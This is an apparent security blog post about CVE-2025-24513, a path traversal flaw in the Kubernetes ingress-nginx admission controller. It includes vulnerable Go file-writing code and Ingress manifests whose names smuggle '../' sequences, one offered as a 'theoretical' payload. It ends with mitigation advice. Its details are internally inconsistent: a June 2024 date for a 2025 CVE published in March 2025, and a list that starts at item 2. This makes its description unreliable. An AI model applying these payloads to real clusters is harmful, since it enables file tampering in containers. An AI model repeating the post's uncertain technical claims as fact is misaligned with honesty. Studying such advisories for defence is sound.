CVE-2025-24513 - Exploiting Directory Traversal in Kubernetes ingress-nginx Admission Controller

Date: June 2024
Severity: High
Affected project: kubernetes/ingress-nginx
CVE: CVE-2025-24513

Overview

A new security flaw, CVE-2025-24513, has been found in the popular ingress-nginx controller for Kubernetes. This issue is a directory traversal vulnerability that allows attackers to manipulate file paths within the container using specially crafted resource data. If successfully exploited, it could be used to cause denial of service, access limited Secret objects, or assist in chaining with other bugs for more serious impact.

Below, we break down how the vulnerability works, how it can be exploited, and what you can do to protect your clusters.

What is ingress-nginx and the Admission Controller?

ingress-nginx is often used to expose HTTP and HTTPS routes from outside the Kubernetes cluster to services within. It includes a component called the "Admission Controller" that checks resources before allowing them to be created or updated. Part of this process involves saving AdmissionReview objects to disk for debugging or audit purposes.

What is the CVE-2025-24513 Vulnerability?

In affected versions, when the Admission Controller writes incoming admission review objects (which include metadata and user-supplied names/labels) to files, it directly uses attacker-controlled fields such as metadata.name as part of the filepath.

An attacker can insert path traversal patterns (like ../) into these fields and trick the Admission Controller into writing outside the intended directory. If the process has sufficient permissions (which it usually does in a container), this can have a variety of dangerous effects.

Suppose the Admission Controller saves AdmissionReview requests like so

reviewFile := fmt.Sprintf("/tmp/admission/%s.json", admissionReview.Request.Name)
os.WriteFile(reviewFile, reviewData, 0644)

If admissionReview.Request.Name is attacker-controlled, an input like ../../../../../etc/secret-data would make reviewFile resolve to /etc/secret-data.json.

Malicious input splices directory traversal (../) into the resource name or another field

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ../../../../tmp/hacked
  namespace: default

When processed, the Admission Controller attempts to write to /tmp/hacked.json (or worse, if repeated parent directories go further up), which could:

2. Limited Secret Disclosure

If combined with other bugs—such as ones allowing read access to files saved in unwelcome locations—this could allow leaking of Secret objects or other sensitive data. By controlling the paths, attackers could time the creation and reading of files to increase the chance of success.

3. Chaining with Other Vulnerabilities

While CVE-2025-24513 alone may be limited to file write within the container, it greatly increases the risk when other flaws (such as container breakout or symlink following) are in play.

Below is a *theoretical* YAML payload for exploiting the bug

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ../../../../etc/test.txt
  annotations:
    kubernetes.io/ingress.class: "nginx"
spec:
  rules:
    - host: test.local
      http:
        paths:
        - backend:
            service:
              name: dummy
              port:
                number: 80
          path: /
          pathType: Prefix

Simply applying this manifest will cause the Admission Controller to try writing a file at /etc/test.txt.json inside the container, potentially overwriting or creating files in sensitive locations.

Mitigation and Fix

- Upgrade ingress-nginx to a patched version (see upstream issue and advisories for details).

Restrict who can create or modify Ingress objects.

- Prevent containers from running as root and limit their permissions using PodSecurityPolicy or PodSecurity Admission.
- Monitor for suspicious resource names (with ../ or long path segments).

Official References

- GitHub Security Advisory
- ingress-nginx main repository
- Directory traversal explained

Conclusion

CVE-2025-24513 is a classic directory traversal bug with a Kubernetes twist. Because Kubernetes resources often take user-supplied data, it's critical that controllers properly sanitize all file paths derived from resource fields. Admins and developers should upgrade ingress-nginx and review any file-writing code for similar issues.

References

- Kubernetes ingress-nginx GitHub
- OWASP Path Traversal
- Kubernetes Admission Controllers

#### _This post is exclusive content written for security awareness and education. Reuse and citation encouraged with attribution._

Timeline

Published on: 03/25/2025 00:15:14 UTC